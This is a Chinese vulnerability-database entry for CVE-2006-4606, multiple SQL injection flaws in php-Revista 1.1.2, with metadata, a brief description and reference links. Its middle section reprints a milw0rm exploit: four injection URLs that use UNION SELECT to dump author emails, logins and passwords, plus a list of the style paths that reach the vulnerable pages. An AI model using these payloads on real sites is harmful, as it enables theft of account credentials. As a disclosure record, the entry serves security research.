PHP-Revista 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112507 漏洞类型 SQL注入
发布时间 2007-03-21 更新时间 2009-04-18
CVE编号 CVE-2006-4606 CNNVD-ID CNNVD-200609-080
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3538
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-080
|漏洞详情
LonginoJacomephp-Revista1.1.2中存在多个SQL注入漏洞,远程攻击者可以通过以下方式执行任意SQL命令:(1)busqueda_tema.php中的id_temas参数,(2)busqueda.php中的cadena参数,(3)autor.php中的id_autor参数,(4)lista.php中的email参数和(5)articulo.php中的id_articulo参数。
|漏洞EXP
php-revista <= 1.1.2  Remote SQL Injection Exploit

Found by & contact : Cold z3ro , cold-z3ro@hotmail.com

script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0


Exploits :
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================

Styles names :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/
==========================================================================================================================================
----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 " alz3eem" | | The_Viper |Kof2002|
             All i know
==========================================================================================================================================


Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

Print :  Team Hell

# milw0rm.com [2007-03-21]
|参考资料

来源:BUGTRAQ
名称:20090413Re:PHP-RevistaMultiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/502637/100/0/threaded
来源:BUGTRAQ
名称:20060902PHP-RevistaMultiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/445007/100/0/threaded
来源:OSVDB
名称:28452
链接:http://www.osvdb.org/28452
来源:OSVDB
名称:28451
链接:http://www.osvdb.org/28451
来源:OSVDB
名称:28448
链接:http://www.osvdb.org/28448
来源:OSVDB
名称:28447
链接:http://www.osvdb.org/28447
来源:OSVDB
名称:28446
链接:http://www.osvdb.org/28446
来源:OSVDB
名称:28445
链接:http://www.osvdb.org/28445
来源:MILW0RM
名称:8425
链接:http://www.milw0rm.com/exploits/8425
来源:VIM
名称:20090415PHP-Revista1.1.2(RFI/SQLi/CB/XSS)MultipleRemoteVulnerabilities
链接:http://www.attrition.org/pipermail/vim/2009-April/002167.html
来源:SECUNIA
名称:21738
链接:http://secunia.com/advisories/21738
来源:BID
名称:23079
链接:http://www.securityfocus.com/bid/23079
来源:BID
名称:19818
链接:http://www.securityfocus.com/bid/19818
来源:MILW0RM
名称:3538
链接:http://www.milw0rm.com/exploits/3538
来源:SREA